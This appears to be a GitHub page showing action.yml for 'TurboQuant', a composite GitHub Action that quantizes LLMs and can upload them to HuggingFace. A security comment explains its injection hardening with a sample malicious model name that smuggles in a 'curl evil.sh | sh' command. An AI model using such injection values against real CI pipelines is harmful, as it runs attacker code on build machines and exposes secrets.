-
Notifications
You must be signed in to change notification settings - Fork 1
Expand file tree
/
Copy path action.yml
More file actions
113 lines (103 loc) · 3.46 KB
/
action.yml
File metadata and controls
113 lines (103 loc) · 3.46 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
# Action metadata — shown on the GitHub Marketplace listing.
name: 'TurboQuant — Quantize LLM'
description: 'Compress any LLM up to 6x in one step. Quantize to GGUF, GPTQ, or AWQ and optionally push to HuggingFace Hub.'
author: 'ShipItAndPray'
# Marketplace badge appearance (icon from the Feather set).
branding:
  icon: 'zap'
  color: 'orange'
# Action inputs. All values arrive as strings (GitHub Actions has no typed
# inputs), so booleans/numbers are compared as strings in the run steps.
inputs:
  model:
    description: 'HuggingFace model ID or path to local model directory'
    required: true
  format:
    description: 'Output format: gguf, gptq, awq, or all'
    required: false
    default: 'gguf'
  bits:
    description: 'Quantization bits: 2, 3, 4, 5, or 8'
    required: false
    default: '4'
  target:
    # When non-empty, the install and run steps use this instead of `format`.
    description: 'Target platform: ollama, vllm, llamacpp, lmstudio (overrides format)'
    required: false
    default: ''
  push-to-hub:
    description: 'HuggingFace repo to upload quantized model (e.g. user/model-GGUF)'
    required: false
    default: ''
  eval:
    # String-typed flag; only the exact value 'true' enables evaluation.
    description: 'Run quality evaluation after quantization'
    required: false
    default: 'false'
  output:
    description: 'Output directory for quantized model'
    required: false
    default: './turboquant-output'
  hf-token:
    description: 'HuggingFace API token (required for --push-to-hub and gated models)'
    required: false
    default: ''
# Action outputs. Composite actions require an explicit `value:` mapping;
# both outputs are derived directly from the `output` input.
outputs:
  output-dir:
    description: 'Directory containing quantized model files'
    value: ${{ inputs.output }}
  report:
    # Report filename is fixed by the turboquant CLI.
    description: 'Path to the JSON compression report'
    value: ${{ inputs.output }}/turboquant-report.json
# Composite action: set up Python, install turboquant + the backends the
# requested format/target needs, optionally log in to HuggingFace, run the
# quantization, and upload the result as a workflow artifact.
#
# Security note: all ${{ inputs.* }} values are passed to shell steps via
# `env:` instead of being interpolated into the script text. Interpolating
# them directly would allow shell injection through input values (e.g. a
# model name of `x; curl evil.sh | sh`) — see GitHub's script-injection
# hardening guidance.
runs:
  using: 'composite'
  steps:
    - name: Set up Python
      uses: actions/setup-python@v5
      with:
        python-version: '3.11'

    - name: Install TurboQuant
      shell: bash
      env:
        FORMAT: ${{ inputs.format }}
        TARGET: ${{ inputs.target }}
      run: |
        pip install --upgrade pip
        pip install turboquant
        # Install requested backends. Extras are quoted so bash never tries
        # to glob-expand the [...] pattern. `format: all` must install the
        # GGUF backend too (it covers gguf+gptq+awq per the input docs).
        if [ "$TARGET" = "ollama" ] || [ "$TARGET" = "llamacpp" ] || [ "$TARGET" = "lmstudio" ] || [ "$FORMAT" = "gguf" ] || [ "$FORMAT" = "all" ]; then
          pip install "turboquant[gguf]" || echo "Warning: GGUF backend install failed"
        fi
        if [ "$TARGET" = "vllm" ] || [ "$FORMAT" = "gptq" ] || [ "$FORMAT" = "all" ]; then
          pip install "turboquant[gptq]" || echo "Warning: GPTQ backend install failed"
        fi
        if [ "$TARGET" = "vllm" ] || [ "$FORMAT" = "awq" ] || [ "$FORMAT" = "all" ]; then
          pip install "turboquant[awq]" || echo "Warning: AWQ backend install failed"
        fi

    - name: Configure HuggingFace token
      if: inputs.hf-token != ''
      shell: bash
      env:
        INPUT_HF_TOKEN: ${{ inputs.hf-token }}
      run: |
        # Mask the token before anything can echo it into the step log.
        echo "::add-mask::$INPUT_HF_TOKEN"
        echo "HF_TOKEN=$INPUT_HF_TOKEN" >> "$GITHUB_ENV"
        # Token is passed from an env var, not interpolated into argv by the
        # workflow template, so it never appears in the rendered script.
        huggingface-cli login --token "$INPUT_HF_TOKEN" --add-to-git-credential

    - name: Run TurboQuant
      shell: bash
      env:
        MODEL: ${{ inputs.model }}
        BITS: ${{ inputs.bits }}
        OUTPUT: ${{ inputs.output }}
        TARGET: ${{ inputs.target }}
        FORMAT: ${{ inputs.format }}
        RUN_EVAL: ${{ inputs.eval }}
        PUSH_TO_HUB: ${{ inputs.push-to-hub }}
      run: |
        # Build argv as a bash array instead of a string + eval: values with
        # spaces or shell metacharacters stay single arguments.
        ARGS=("$MODEL" --bits "$BITS" --output "$OUTPUT")
        # Target overrides format.
        if [ -n "$TARGET" ]; then
          ARGS+=(--target "$TARGET")
        else
          ARGS+=(--format "$FORMAT")
        fi
        # Optional flags.
        if [ "$RUN_EVAL" = "true" ]; then
          ARGS+=(--eval)
        fi
        if [ -n "$PUSH_TO_HUB" ]; then
          ARGS+=(--push-to-hub "$PUSH_TO_HUB")
        fi
        echo "Running: turboquant ${ARGS[*]}"
        turboquant "${ARGS[@]}"

    - name: Upload artifacts
      if: always()
      uses: actions/upload-artifact@v4
      with:
        name: turboquant-output
        path: ${{ inputs.output }}
        retention-days: 30